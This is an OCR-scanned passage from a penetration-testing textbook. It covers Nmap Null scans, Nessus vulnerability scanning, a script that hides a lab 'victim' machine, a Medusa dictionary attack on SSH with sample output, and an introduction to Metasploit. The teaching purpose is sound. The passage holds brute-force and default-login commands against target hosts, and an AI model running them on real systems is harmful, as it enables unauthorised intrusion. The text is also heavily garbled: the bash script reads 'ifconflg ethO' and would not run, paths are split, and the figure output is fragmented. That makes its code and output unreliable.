4007Target systems will respond to Null scans in the exact same way they respond
4008to Xmas Tree scans. Specifically, an open port on the target system will send
4009no response back to Nmap, whereas a closed port will respond with an RST
4010packet. It is important to remember that these scans are only reliable for oper-
4011ating systems that comply 100 percent with the TCP RFC.
4012
4013One of the main advantages of running Xmas Tree and Null scans is that
4014in some cases, you are able to bypass simple filters and Access Control Lists
4015(ACLs). Some of these primitive filters work by blocking inbound SYN packets.
4016The thought with this type of filter is that by preventing the SYN packet from
4017entering the system, it is not possible for the three-way handshake to occur. If
4018the three-way handshake does not occur, there can be no TCP communication
4019streams between the systems, or more precisely, no TCP communications can
4020be originated from outside of the filter.
4021
4022It is important to understand that neither the Xmas Tree nor the Null scans
4023seek to establish any type of communication channel. The whole goal of these
4024scans is to determine if a port is open or closed.
4025
4026
4027
4028
4029Scanning CHAPTER 3
4030
4031
4032
4033With the previous two paragraphs in mind, consider the following example.
4034Assume that our Network Admin Ben Owned puts a simple firewall in front
4035of his system to prevent anyone outside of his network from connecting to
4036the system. The firewall works by simply dropping any external communica-
4037tions that begin with a SYN packet. Ben hires his buddy the ethical hacker, to
4038scan his system. The ethical hacker's initial TCP Connect scans show nothing.
4039However, being a seasoned penetration tester, the ethical hacker follows up his
4040initial scan with UDP, Xmas Tree, and Null scans. The ethical hacker smiles
4041when he discovers that both his Xmas Tree scans and Null scans reveal open
4042ports on Ben's system.
4043
4044This scenario is possible because Nmap creates packets without the SYN flag
4045set. Because the filter is only dropping incoming packets with the SYN flag, the
4046Xmas Tree and Null packets are allowed through. To run a Null scan, we issue
4047the following command in a terminal:
4048
4049nmap -sN -p- -PN 172.16.45.129
4050
4051Port Scanning Wrap Up
4052
4053Now that we have covered the basics of port scanning, there are a few addi-
4054tional switches that need to be covered. These switches provide additional
4055functionality that may be useful to you as you progress in your penetration
4056testing career.
4057
4058As mentioned earlier, the "-sV" switch is used for version scanning. When con-
4059ducting version scanning, Nmap sends probes to the open port in an attempt
4060to determine specific information about the service that is listening. When
4061possible, Nmap will provide details about the service including version num-
4062bers and other banner information. This information should be recorded in
4063your notes. It is recommended that you use the "-sV" switch whenever possi-
4064ble, especially on unusual or unexpected ports, because a wily administrator
4065may have moved his web server to port 34567 in an attempt to obscure the
4066service.
4067
4068Nmap includes an option to change the speed of your port scan. This is done
4069with the "-T" switch. The timing switch ranges on a numeric scale from 0 to 5,
4070with 0 being the slowest scan and 5 being the fastest. Timing options are useful
4071if you are attempting to avoid detection by sending your scan more slowly; or
4072if you have a large number of IPs to scan and you have a limited time to com-
4073plete the scan where faster scans would be more appropriate. Please be aware
4074that by using the fastest scans possible, Nmap may provide less accurate results.
4075
4076Lastly, the "-O" switch can be useful for fingerprinting the operating system.
4077This is handy for determining if the target you are attacking is a Windows,
4078Linux, or other type of machine. Knowing the operating system of your target
4079will save you time by allowing you to focus your attacks to known weaknesses
4080of that system. There is no use in exploring exploits for a Linux machine if your
4081target is running Windows.
4082
4083
4084
4085The Basics of Hacking and Penetration Testing
4086
4087
4088
4089Once we have completed port scanning our target, we should have a list of
4090open ports and services. This information should be documented and reviewed
4091closely. While reviewing the Nmap output, you should take a few moments to
4092attempt to log into any remote access services that were discovered in your port
4093scan. The next chapter will address running a brute force tool to attempt to log
4094in. For the time being, you can attempt to log in using default usernames and
4095passwords. You could also try logging in using any information, usernames, or
4096e-mail addresses you found during reconnaissance. It is possible to complete a
4097penetration test by simply discovering an open remote connection and logging
4098into the box with a default username and password. Telnet and SSH are great
4099remote services that you should always try to connect to. You can do this from
4100the command line by typing:
4101
4102telnet target_ip
4103ssh root@ta rget_i p
4104
4105In this example, the "target_ip" is the IP address of your victim. Most likely
4106these will fail, but on the rare occasion when you are successful, these are an
4107absolute home run.
4108
4109VULNERABILITY SCANNING
4110
4111Now that we have a list of IPs, open ports, and services on each machine, it
4112is time to scan the targets for vulnerabilities. A vulnerability is a weakness in
4113the software or system configuration that can be exploited. Vulnerabilities
4114can come in many forms but most often they are associated with missing
4115patches. Vendors often release patches to fix a known problem or vulnerability.
4116Unpatched software and systems often lead to quick penetration tests because
4117some vulnerabilities allow remote code execution. Remote code execution is
4118definitely one of the holy grails of hacking.
4119
4120It is important to understand this step as the results will feed directly into step
41213 where we will gain access to the system. To scan systems for vulnerabilities,
4122we will use a vulnerability scanner. There are several good scanners available to
4123you but for this book we will be focusing on Nessus.
4124
4125Nessus is a great tool and available for free, for a home user, from their website.
4126You can download a full-fledged version of Nessus and get a key for free. If you
4127are going to use Nessus in a corporate environment, you will need to sign up
4128for the Professional Feed rather than the Home Feed. The Professional Feed will
4129run you about $ 100 a month. We will be using the Home version for this book.
4130
4131Installing Nessus is very straightforward. It will run on either Linux or Windows.
4132Nessus runs using a client/server architecture. Once set up, the server runs quietly
4133in the background, and you interact with the server through a browser. To install
4134Nessus, you need to complete the following steps:
4135
41361. Download the installer from www.nessus.org.
4137
41382. Register for a key on the Nessus website by submitting your e-mail address.
4139The Nessus crew will e-mail you a unique product key that can be used to
4140register the product.
4141
4142
4143
4144Scanning CHAPTER 3
4145
4146
4147
41483. Install the program.
4149
41504. Create a Nessus user to access the system.
4151
41525. Update the plug-ins.
4153
4154One of the key components of Nessus is the plug-ins. A plug-in is a small
4155block of code that is sent to the target machine to check for a known vulner-
4156ability. Nessus has literally thousands of plug-ins. These will need to be down-
4157loaded the first time you start the program. The default installation will set up
4158Nessus to automatically update the plug-ins for you.
4159
4160Once you have installed the Nessus server, you can access it by opening a
4161browser and entering https://127. 0.0. 1:8834 in the URL (assuming you are
4162accessing Nessus on the same computer you installed the server on). Do not
4163forget the "https" in the URL as Nessus uses a secure connection when com-
4164municating with the server. You will be prompted with a log-in screen. You
4165can use the username and password you created when installing the program.
4166Once you log into the program, you will be presented with a screen similar to
4167Figure 3.6.
4168
4169Before we can use Nessus, we need to set up a scan policy. You can do this
4170by clicking on the "Policies" tab at the top of the web page. To set up a scan
4171policy, you need to provide a name. If you are going to set up multiple policies,
4172you should also enter a description. Please take a minute to review Figure 3.6
4173and notice there is a check in the box next to "Safe Checks."
4174
4175When setting up Nessus for the first time, it is common to create two
4176policies: one with the "Safe Checks" checked and the other with the "Safe
4177Checks" unchecked. The reason for this is simple. Some plug-ins and checks
4178are considered dangerous because they check for the vulnerability by attempt-
4179ing to actually exploit the system. Be aware that removing the "Safe Checks"
4180
4181
4182
4183
4184FIGURE 3.6
4185
4186Screenshot of Nessus.
4187
4188
4189
4190The Basics of Hacking and Penetration Testing
4191
4192
4193
4194check has the potential to cause network and system disruptions or even take
4195systems off-line. By setting up one policy with the "Safe Checks" enabled and
4196one with the "Safe Checks" disabled, you can avoid unintentional network
4197disruptions.
4198
4199There are many options that you can use to customize your scan. For the pur-
4200pose of this book, we will use the defaults. Take a moment to review the vari-
4201ous options by clicking "Next" in the lower right. This will take you through
4202each of the remaining pages where you can set additional options for your
4203scan.
4204
4205Once your scan is set, you can save it by clicking on the "Submit" button that
4206will appear after you have reviewed each of the scan option pages. You only
4207need to set up your scan policy one time. Once your scan has been submitted,
4208you will be able to use that policy to perform vulnerability scans against your
4209target.
4210
4211Now that you have a scan policy set up, you can run a scan against your target.
4212To set up a scan, you need to click on the "Scans" link located in the top menu.
4213You can enter individual addresses to scan a single target or a list of IPs to scan
4214multiple hosts. Figure 3.7 shows the "Scan" screen.
4215
4216
4217
4218
4219FIGURE 3.7
4220
4221Setting up the Nessus Scan
4222
4223
4224
4225Scanning CHAPTER 3
4226
4227
4228
4229You need to enter a name for the scan, select a policy, and enter the IP address
4230of your targets. You can enter your target IP addresses individually in the "Scan
4231Targets" box or if you have your target IP addresses saved to a text file, you can
4232use the "Browse. . . " button to locate and load it. Once your options are set, you
4233can click on the "Launch Scan" button in the lower right. Nessus will provide
4234you with information about the progress of your scan while it is running.
4235
4236When Nessus finishes the scan, you will be able to review the results by click-
4237ing on the "Reports" link in the menu bar. The report will provide you with a
4238detailed listing of all the vulnerabilities that Nessus discovered. We are espe-
4239cially interested in vulnerabilities labeled as High. You should take time to
4240closely review the report and make detailed notes about the system. We will
4241use these results in the next step to gain access to the system.
4242
4243Once we have completed port scanning and vulnerability scanning for each
4244of our targets, we should have enough information to begin attacking the
4245system.
4246
4247
4248
4249HOW DO I PRACTICE THIS STEP?
4250
4251The easiest way to practice port scanning is to set up two machines or use
4252virtual machines. You should work your way through each of the options
4253and scan types that we covered in this chapter. Pay special attention to the out-
4254put from each scan. You should run scans against both Linux and Windows
4255boxes.
4256
4257You will probably want to add some services or programs to the target system
4258so that you can be sure you will have open ports. Installing and starting FTP, a
4259web server, telnet, or SSH will work nicely.
4260
4261When a person is first learning about port scanning, one of the best ways to
4262practice is to pick a subnet and hide an IP address in the network. After hid-
4263ing the target in the subnet, the goal is to locate the target. Once the target has
4264been located, the next step is to conduct a full port scan of the system.
4265
4266To assist with the scenario described above, a simple script has been created,
4267which can be used to "hide" your system in a given subnet. The code is meant
4268to be run on a Linux machine. Feel free to modify it by changing the IP address
4269so that it will work on your network. The script generates a random num-
4270ber between 1 and 254. This number is to be used as the final octet in the IP
4271address. Once the random IP address is created, the script applies the address
4272to the machine.
4273
4274Running this script will allow you to become familiar with the tools and tech-
4275niques we covered in this chapter. You can enter the script into a text editor
4276and save the file as IP_Gen.sh.
4277
4278
4279
4280The Basics of Hacking and Penetration Testing
4281
4282
4283
4284#!/bin/bash
4285
4286echo "Setting up the victim machine, this will take just a
4287moment ..."
4288ifconflg ethO down
4289
4290ifconflg ethO 172 . 16 . 45 . $ ( ( ( $ RANDOM %254 ) + 1 )) up
4291
4292# uncomment the following lines by removing the #, to start up
4293services on your victim
4294
4295# please note, you may need to change the location / path depending
4296on your distro
4297
4298#/etc/init.d/ssh start
4299
4300# note, you may have to generate your SSH key using sshd-generate
4301#/etc/init.d/apache2 start
4302
4303#/etc/init.d/atftpd start
4304
4305echo "This victim machine is now setup."
4306
4307echo "The IP address is somewhere in the 172.16.45.0/24 network."
4308echo "You may now close this window and begin your attack ... Good
43091 uck! "
4310
4311You will need to use a terminal to navigate to the directory where you created
4312the file. You need to make the file executable before you can run it. You can do
4313this by typing:
4314
4315chmod 755 IP_Gen.sh
4316To run the script, you type the following command into a terminal:
4317
4318./IP_Gen.sh
4319
4320The script should run and provide you with a message saying the victim
4321machine is all set up. Using the script above you will be able to practice locat-
4322ing and scanning a target machine.
4323
4324WHERE DO I GO FROM HERE?
4325
4326Once you have mastered the basics of Nmap and Nessus, you should dig into
4327the advanced options for both tools. This chapter only scratched the surface
4328of both of these fine tools. Insecure.org is a great resource for learning more
4329about Nmap. You should dedicate time to exploring and learning all of the var-
4330ious switches and options. Likewise, Nessus has a plethora of additional fea-
4331tures. Take time to review the various scans and policy options.
4332
4333/After you are comfortable with the advanced features of these tools, you should
4334look at other scanners as well. There are dozens of good port scanners avail-
4335able. Pick a few, install them, and learn their features. There are several com-
4336mercial products that you should become familiar with; these products are not
4337exclusively vulnerability scanners (they are much more), but Core Impact and
4338Saint both provide excellent vulnerability assessment components, although
4339both of these tools will cost you actual cash.
4340
4341
4342
4343Scanning CHAPTER 3
4344
4345
4346
4347SUMMARY
4348
4349This chapter focused on step 2 that consists mainly of scanning. The chapter
4350started with a brief overview of pings and ping sweeps before moving into the
4351specifics of scanning. The topic of scanning is further broken down into two
4352distinct types including port scanning and vulnerability scanning. The port
4353scanner Nmap was introduced and several different types of scans were dis-
4354cussed. Actual examples and outputs of the various scans were demonstrated
4355as well as the interpretation of the Nmap output. The concept of vulnerability
4356scanning was introduced through the use of Nessus. Practical examples were
4357presented and discussed throughout the chapter.
4358
4359
4360
4361This page intentionally left blank
4362
4363
4364
4365
4366Information in This Chapter:
4367
4368â– Gaining Access to Remote Services with Medusa
4369
4370â– Metasploit: Hacking Hugh Jackman Style!
4371
4372â– John the Ripper: King of the Password Crackers
4373
4374â– Password Resetting: Kind of Like Driving a Bulldozer through the Side of a
4375Building
4376
4377â– Sniffing Network Traffic
4378
4379â– Macof: Making Chicken Salad Out of Chicken Sh*t
4380
4381â– Fast-Track Autopwn: Breaking Out the M-60
4382
4383
4384
4385INTRODUCTION
4386
4387Exploitation is the process of gaining control over a system. This process can
4388take many different forms but for the purpose of this book the end goal always
4389remains the same: administrative-level access to the computer. In many ways,
4390
4391
4392
4393The Basics of Hacking and Penetration Testing
4394
4395
4396
4397exploitation is the attempt to turn the target machine into a puppet that will
4398execute your commands and do your bidding. Just to be clear, exploitation is
4399the process of launching an exploit. An exploit is the realization of a vulner-
4400ability. Exploits are issues or bugs in the software code that allow a hacker or
4401attacker to alter the original functionality of the software.
4402
4403Of all the steps we cover, exploitation is probably the step aspiring hackers
4404are most interested in. It certainly gets a lot of attention because this phase
4405involves many of the traditional activities that people associate with "hacking"
4406and penetration testing. There are volumes of books that are dedicated to the
4407process of exploitation. Unfortunately, there are also volumes of misinforma-
4408tion regarding step 3. Stories from Hollywood and urban legends of famed
4409hacker exploits have tainted the mind of many newcomers. However, this does
4410not mean that exploitation is any less exciting or exhilarating. On the contrary,
4411exploitation is still my favorite step, even if there is a little less "shock and awe"
4412than portrayed in a typical hacker movie. But when completed successfully,
4413exploitation remains simply breathtaking.
4414
4415Of all the steps we discuss, exploitation is probably the least well defined and
4416most open to interpretation. When combined, these two qualities often bring
4417chaos and confusion to people trying to learn penetration testing and hacking.
4418The lack of order and structure in a penetration test often leads to frustration
4419and failure. It is not uncommon for a novice to read about a new tool, or lis-
4420ten to a speaker talk about some advanced technique that can be used to gain
4421access to a system, and want to jump directly to step 3 (exploitation). However,
4422it is important to remember that penetration testing is more than just exploi-
4423tation. Fortunately by following the process identified in this book or by any
4424other solid penetration testing methodology, you can alleviate many of these
4425issues.
4426
4427Because this book focuses on the basics, and as a final warning, it is critical to
4428stress the importance of completing steps 1 and 2 prior to conducting exploi-
4429tation. It can be tempting to bypass reconnaissance and scanning and jump
4430directly to Chapter 4. That is OK for now, but if you are ever going to advance
4431your skills beyond the script kiddie level, you will need to master the other
4432steps as well. The failure to do so will not only severely limit your ability to
4433grow as a penetration tester but will also eventually stunt your growth as an
4434exploitation expert. Reconnaissance and scanning will help to bring order and
4435direction to exploitation.
4436
4437OK. Now that the speech is over, let us put away the soapbox and get to the
4438business at hand: exploitation. As mentioned earlier, exploitation is the most
4439free-flowing phase we will cover. The reason for this is simple; each system is
4440different and each target is unique. Depending on a multitude of factors, your
4441attack vectors will vary from target to target. Different operating systems, dif-
4442ferent services, and different processes require different types of attacks. Skilled
4443attackers have to understand the nuances of each system they are attempting
4444to exploit. As your skills continue to progress from Padawan to Jedi, you will
4445
4446
4447
4448Exploitation CHAPTER 4
4449
4450
4451
4452need to expand your knowledge of systems and their exploits. Eventually you
4453will learn how to create custom exploits.
4454
4455You can use the previous step's output as a guide for where to begin your
4456exploitation attempts. The output from scanning should be used to help shape,
4457focus, and direct your attacks.
4458
4459GAINING ACCESS TO REMOTE SERVICES WITH
4460MEDUSA
4461
4462When reviewing the output from step 2, always make special notes of IP
4463addresses that include some type of remote access service. SSH, Telnet, FTP, PC
4464Anywhere, and VNC are popular choices because gaining access to these ser-
4465vices often results in the complete owning of that target. Upon discovery of one
4466of these services, hackers typically turn to an "online password cracker. " Online
4467password crackers work by attempting to brute force their way into a system by
4468trying an exhaustive list of passwords and/or username combinations.
4469
4470When using online password crackers, the potential for success can be greatly
4471increased if you combine this attack with information gathered from step 1 .
4472Specifically you should be sure to include any usernames or passwords you
4473discovered. The process of online password cracking literally requires the
4474attacking program to send a username and a password to the target. If either
4475the username or password is incorrect, the attack program will be presented
4476with an error message and the log-in will fail. The password cracker will then
4477send the next username and password combination. This process continues
4478until the program is either successful in finding a login/password combo or
4479it exhausts all the guesses. On the whole, even though computers are great at
4480repetitive tasks like this, the process is rather slow.
4481
4482You should be aware that some remote access systems employ a password
4483throttling technique that can limit the number of unsuccessful log-ins you are
4484allowed. In these instances either your IP address can be blocked or the user-
4485name can be locked out.
4486
4487There are many different tools that can be used for online password cracking.
4488Two of the most popular tools are Medusa and Hydra. These tools are very
4489similar in nature. In this book, the focus will be on Medusa, but it is strongly
4490encouraged that you become familiar with Hydra as well.
4491
4492Medusa is described as a parallel log-in brute forcer that attempts to gain access
4493to remote authentication services. Medusa is capable of authenticating with
4494a large number of remote services including AFP, FTP, HTTP, IMAP, MS-SQL,
4495MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, REXEC, RLOGIN, SMTP-
4496AUTH, SNMP, SSHv2, Telnet, VNC, Web Form, and more.
4497
4498In order to use Medusa, you need several pieces of information including
4499the target IP address, a username or username list that you are attempting to
4500log in as, a password or dictionary file containing multiple passwords to use
4501
4502
4503
4504The Basics of Hacking and Penetration Testing
4505
4506
4507
4508when logging in, and the name of the service you are attempting to authenti-
4509cate with.
4510
4511One of the requirements listed above is a dictionary list. A password dictionary
4512is a file that contains a list of potential passwords. These lists are often referred
4513to as dictionaries because they contain thousands or even millions of individual
4514words. People often use plain English words or some small variation like a 1 for
4515an i, or a 5 for an s when they create passwords. Password lists attempt to collect
4516as many of these words as possible. Some hackers and penetration testers spend
4517years building password dictionaries that grow to gigabytes in size. A good dic-
4518tionary can be extremely useful but often requires a lot of time and attention to
4519keep clean. Clean dictionaries are streamlined and free of duplication.
4520
4521There are plenty of small wordlists that can be downloaded from the Internet
4522and serve as a good starting point for building your own personal password
4523dictionary. There are also tools available that will build dictionaries for us.
4524However, fortunately the fine folks at Backtrack have already included a few
4525word lists for us to use. You can find these dictionaries in the /pentest/pass-
4526words/wordlists directory. There is also a small list included with the John
4527the Pdpper located at: /pentest/passwords/jtr/pas sword. 1st.
4528
4529Once you have your password dictionary, you need to decide if you are going
4530to attempt to log in as a single user or if you want to supply a list of potential
4531users. If your reconnaissance efforts were rewarded with a list of usernames,
4532you may want to start with those. If you were unsuccessful in gathering user-
4533names and passwords, you may want to focus on the results of the e-mail
4534addresses you collected with The Harvester. Remember the first part of an
4535e-mail address can often be used to generate a working domain username.
4536
4537Assume that during your penetration test you were unable to find any domain
4538usernames. However, The Harvester was able to dig up the e-mail address ben.
4539owned@example.com. When using Medusa, one option is to create a list of
4540potential usernames based on the e-mail address. These would include ben.
4541owned, benowned, bowned, ownedb, and several other combinations derived
4542from the e-mail address. After creating a list of 5-10 usernames, it is possible to
4543feed this list into Medusa and attempt to brute force my way into the remote
4544authentication service.
4545
4546Now that we have a target IP address with some remote authentication ser-
4547vice (we will assume SSH for this example), a password dictionary, and at least
4548one username, we are ready to run Medusa. In order to execute the attack, you
4549open a terminal and issue the following command:
4550
4551medusa -h target_ip -u username -P path_to_password_dictionary -M
4552authenticatior_servic e_t o_a 1 1 a c k
4553
4554Take a moment to examine this command in more detail; you will need to cus-
4555tomize the information for your target:
4556
4557The first keyword "medusa" is used to start the brute forcing program,
4558"-h" is used to specify the IP address of the target host.
4559
4560
4561
4562Exploitation CHAPTER 4
4563
4564
4565
4566The "-u" is used to denote a single username that Medusa will use to
4567attempt log-ins.
4568
4569If you generated a list of usernames and would like to attempt to log in
4570with each of the names on the list, you can issue a capital "-U" followed by
4571the path to the username file.
4572
4573Likewise, the lowercase "-p" is used to specify a single password, whereas a
4574capital "-P" is used to specify an entire list containing multiple passwords.
4575The "-P" needs to be followed by the actual location or path to the diction-
4576ary file.
4577
4578The "-M" switch is used to specify which service we want to attack.
4579
4580To clarify this attack, let us continue with the example we set up earlier.
4581Suppose we have been hired to conduct a penetration test against the com-
4582pany "Example.com." During our information gathering with MetaGooFil, we
4583uncover the username of "ownedb" and an IP address of 172.16.45.129. After
4584port scanning the target, we discover that the server is running SSH on port 22.
4585Moving to step 3, one of the first things to do is to attempt to brute force our
4586way into the server. After firing up Backtrack and opening a terminal, we issue
4587the following command:
4588
4589medusa -h 172.16.45.129 -u ownedb -P /pentest/passwords/wordl i sts/
4590darkcOde.lst -M ssh
4591
4592Figure 4.1 shows the command and its associated output.
4593
4594
4595
4596ji1><:-# medusa *h 172.16.45.129 *u ownedb -P /pentest/passwords/wordlists/darkc8de. 1st *H ssh
4597s.'i v2,9 [http://www.foOfus.netl IC) JoMo-Kun / Foofus Networks -ejmkgfoof U5.net>
4598
4599
4600
4601ACCOUNT CHECK: (sshl Host: 172.16.45.129 (1 of 1, B complete) User: ownedb
4602Password: [18] (1 of 1707G55 complete)
4603
4604ACCOUNT CHECK: [ssh] Host: 172.16.45.129 (1 of I, a complete) User:
4605Password: 118] [IB! [2 of 1797655 complete)
4606
4607account CHECK: [ssh] Host: 172.16.45.129 (I of l, 9 complete) User:
4608Password: 118] 116] (IB) (3 of 1787655 complete)
4609
4610ACCOUNT CHECK: [ssh| Host; 172.16.45.129 (1 of 1, 9 complete) User;
4611Password: 11BI I IB] 1 18] [IB] (4 of 17676SS complete)
4612ACCOUNT CHECK: [ssh] Host: 172.16.45.129 (1 of 1. B complete) User:
4613Password: [lBlilB][18][lS][lBl (5 of 1797655 complete)
4614ACCOUNT CHECK: [ssh] Host: 172.16.45.129 (1 of 1, 8 complete) User:
4615Password: tlBl[lB][lBl[lB][lB)!lB] (6 Of 1787655 complete)
4616account check: [ssh] Host: 172. 16. 45.129 (i of l, a complete) user:
4617Password: [IS] ! IB) ( 18] [IB] [ IB] 1 181 1 IB! <7 of 17B765S complete)
4618ACCOUNT CHECK: [ssh] Host: 172.16.45.129 (1 of 1. 9 complete) User:
4619Password: [18] [IB] [18] [IB] I IB) [18] [IB] [18] (8 of 1787655 complete)
4620ACCOUNT CHECK: [ssh] Host: 172.16.45.129 (1 of 1, 6 complete) User;
4621Password: (9 of 1767655 complete)
4622
4623ACCOUNT CHECK: [sshl Host: 172.16.45.129 (1 of 1, B complete) User:
4624Password: 'maonus (10 of 1797655 complete)
4625
4626ACCOUNT CHECK: (ssh) Host: 172.16.45.129 (1 of 1, 9 complete) user:
4627Password: â–º power (11 of 170765S complete)
4628
4629ACCOUNT FOUND: [SSh] Host: 172.16.45.129 User
4630
4631
4632
4633ownedb Password:
4634
4635
4636
4637ownedb
4638
4639
4640
4641
4642
4643
46441,
4645
4646
4647B complete)
4648
4649
4650ownedb
4651
4652
4653
4654
4655of
4656
4657
46581,
4659
4660
4661B complete)
4662
4663
4664ownedb
4665
4666
4667
4668
4669of
4670
4671
46721,
4673
4674
46759 complete)
4676
4677
4678ownedb
4679
4680
4681
4682
4683of
4684
4685
46861,
4687
4688
46899 complete)
4690
4691
4692ownedb
4693
4694
4695
4696
4697of
4698
4699
47001,
4701
4702
4703B complete)
4704
4705
4706ownedb
4707
4708
4709
4710
4711Of
4712
4713
4714I .
4715
4716
4717B complete)
4718
4719
4720ownedb
4721
4722
4723
4724
4725of
4726
4727
47281.
4729
4730
47319 complete)
4732
4733
4734ownedb
4735
4736
4737
4738
4739of
4740
4741
47421,
4743
4744
47459 complete)
4746
4747
4748ownedb
4749
4750
4751
4752
4753of
4754
4755
47561.
4757
4758
47599 complete)
4760
4761
4762ownedb
4763
4764
4765
4766
4767of
4768
4769
47701,
4771
4772
47738 complete)
4774
4775
4776ownedb
4777
4778
4779
4780
4781or
4782
4783
47841,
4785
4786
47879 complete)
4788
4789
4790ler [success]
4791
4792
4793
4794
4795
4796
4797
4798FIGURE 4.1
4799
4800Using Medusa to Brute Force into SSH.
4801
4802
4803
4804The Basics of Hacking and Penetration Testing
4805
4806
4807
4808f \
4809
4810
4811
4812ALERT!
4813
4814
4815
4816If you are having problems getting Medusa (or any of the tools covered in this book)
4817to run on your version of Backtrack, it may be helpful to reinstall the program as we
4818discussed in Chapter 1. You can reinstall Medusa with the following commands:
4819
4820apt-get update
4821apt-get install medusa
4822V )
4823
4824The first line shows the command we issued; the second line is an informa-
4825tional banner that is displayed when the program begins. The remaining lines
4826show a series of log-in attempts with the username "ownedb" and various pass-
4827words beginning with "[IB]." Notice on the 11th log-in attempt Medusa is suc-
4828cessful in accessing the system with a username of "ownedb" and a password of
4829".'power." At this point we would be able to remotely log in as the user.
4830
4831Depending on the level of engagement and goals identified in your authoriza-
4832tion and agreement form, you may be done with the penetration test at this
4833point. Congratulations! You just completed your first penetration test and suc-
4834cessfully gained access to a remote system.
4835
4836Although it is not always quite that easy, you will be surprised at how many
4837times a simple tactic like this works and allows you full access and control of a
4838remote system.
4839
4840
4841
4842METASPLOIT: HACKING, HUGH JACKMAN STYLE!
4843
4844Of all the tools discussed in this book, Metasploit is my favorite. In many ways,
4845it is the quintessential hacker tool. It is powerful, flexible, free, and loaded
4846with awesomeness. It is without a doubt the coolest offensive tool covered in
4847this book and in some cases it even allows you to hack like Hugh Jackman in
4848Swordfish! Seriously, it is that good. If you ever get a chance to meet HD Moore
4849or any of the other original Metasploit crew, buy them a beer, shake their hand,
4850and say thanks, because Metasploit is ALL that and more.
4851
4852In 2004, at Defcon 12, HD Moore and spoonm rocked the world when they
4853gave a talk titled "Metasploit: Hacking Like in the Movies." This presentation
4854focused on "exploit frameworks." An exploit framework is formal structure for
4855developing and launching exploits. Frameworks assist the development process
4856by providing organization and guidelines for how the various pieces are assem-
4857bled and interact with each other.
4858
4859Metasploit actually started out as a network game, but its full potential was
4860realized when it was transformed into a full-fledged exploit tool. Metasploit
4861actually contains a suite of tools including some great anti-forensics stuff;
4862however, the project is probably best known for the Metasploit Framework
4863component.
4864
4865
4866
4867Exploitation CHAPTER 4
4868
4869
4870
4871Before the release of Metasploit, security researchers had two main choices:
4872they could develop custom code by piecing together various exploits and pay-
4873loads or they could invest in one of the two commercially available exploit
4874frameworks, CORE Impact or ImunitySec's CANVAS. Both Impact and CANVAS
4875were great choices and highly successful in their own right. Unfortunately, the
4876cost to license and use these products meant many security researchers did not
4877have access to them.
4878
4879Metasploit was different from everything else because for the first time hack-
4880ers and penetration testers had access to a truly open source exploit framework.
4881This meant that for the first time everyone could access, collaborate, develop,
4882and share exploits for free. It also meant that exploits could be developed in an
4883almost factory-like assembly line approach. The assembly line approach allowed
4884hackers and penetration testers to build exploits based on their own needs.
4885
4886Metasploit allows you to select the target and choose from a wide variety of
4887payloads. The payloads are interchangeable and not tied to a specific exploit. A
4888payload is the "additional functionality" or change in behavior that you want
4889to accomplish on the target machine. It is the answer to the question: "What
4890do I want to do now that I have control of the machine?" Metasploit's most
4891popular payloads include adding new users, opening backdoors, and installing
4892new software onto a target machine. The full list of Metasploit payloads will be
4893covered shortly.
4894
4895Before we begin covering the details of how to use Metasploit, it is important
4896to understand the distinction between Metasploit and a vulnerability scanner.
4897In most instances, when we use a vulnerability scanner, the scanner will only
4898check to see if a system is vulnerable. This occurs in a very passive way with little
4899chance of any unintentional damage or disruption to the target. Metasploit and
4900other frameworks are exploitation tools. These tools do not perform tests; these
4901tools are used to complete the actual exploitation of the target. Vulnerability
4902scanners look for and report potential weaknesses. Metasploit attempts to actu-
4903ally exploit the systems it scans. Make sure you understand this.
4904
4905In 2009, Rapid 7 purchased Metasploit. HD Moore spent a considerable
4906amount of time putting people at ease and reassuring everyone that Metasploit
4907would remain free. Although several great commercial products have since been
4908released including Metasploit Express and Metasploit Pro, HD has been true to
4909his word and the original Metasploit project remains free. In fact, the purchase
4910of Metasploit by Rapid 7 has been a huge boost to the Metasploit project. The
4911open source project is clearly benefitting from the commercial tool push with
4912additional full-time developers and staff. The rate at which new exploits and
4913functionality is being added is staggering. We will focus on the basics here, but
4914you will want to stay on top of latest developments going forward.
4915
4916Metasploit can be downloaded for free by clicking on the Framework link
4917located at http://www.metasploit.com. If you are using Backtrack, Metasploit
4918is already installed for you. There are several different ways to interact with
4919
4920
4921
4922The Basics of Hacking and Penetration Testing
4923
4924
4925
4926Metasploit, but this book will focus on using the menu-driven, non-GUI,
4927text-based system called the Msfconsole. Once you understand the basics,
4928the Msfconsole is fast, friendly, intuitive, and easy to use. When possible, you
4929should avoid the Msfweb or Msfgui versions especially when first learning.
4930
4931We can access the Msfconsole by either opening a terminal window and
4932entering:
4933
4934/pentest/exploi ts/f ramework3/msf consol e
4935
4936The Msfconsole can also be accessed through the menu by clicking on the
4937K-Start dragon, and navigating to: Backtrack — » Penetration — * Metasploit
4938Exploitation Framework — » Framework Version 3 — » Msfconsole.
4939
4940Starting the Msfconsole takes between 10 and 30 seconds, so do not panic if
4941nothing happens for a few moments. Eventually Metasploit will start by pre-
4942senting you with a welcome banner and an "msf>" command prompt. There
4943are several different Metasploit banners that are rotated and displayed at ran-
4944dom so if your screen looks different from Figure 4.2, that is normal. The
4945important thing is that you get the msf> console. The initial Metasploit screen
4946is shown in Figure 4.2.
4947
4948Please notice, when Metasploit first loads, it shows you the number of exploits,
4949payloads, encoders, and nops available. It also shows you how many days have
4950passed since your last update. Because of Metasploit's rapid growth and official
4951funding, it is vital that you keep Metasploit up-to-date. This is easily accom-
4952plished by entering the following command after the "msf>" prompt: msfup-
4953date. Get into the habit of running this command often.
4954
4955Now that Metasploit is updated, let us begin exploring the awesomeness of this
4956tool. In order to use Metasploit a target must be identified, and exploit must be
4957
4958
4959
4960shell - Msfconsole
4961
4962
4963
4964Session Edit View Ron km arte* Settings HeJp
4965
4966
4967
4968(Ml
4969
4970<_.) )V
4971
4972n -ii •
4973
4974
4975
4976â– [ wUipldlt v3 4.2-dcv tcorf:J. 4 api 1 0J_
4977
4978- I htA exploits • ifiz auxiliary
4979
4980>[ 21ft paylosds â– 27 encoders - ft nop*
4981
4982-I swn rftftftj updated (201ft. $7,1)
4983
4984
4985
4986Warning: This copy of the Metasploit Framework wss last updated
4987
4988We recommend that you update the framework al least every other day.
4989Tor information on updating your copy of Hetasploit* please see:
4990
4991fittp r//Vww-neta9plQit . con/ redminO/proj^qt S/ framework /wiki/Updat 4 ng
4992
4993
4994
4995FIGURE 4.2
4996
4997Initial Metasploit Screen.
4998
4999
5000
5001Exploitation CHAPTER 4
5002
5003
5004
5005selected, a payload needs to be picked, and the exploit itself must be launched.
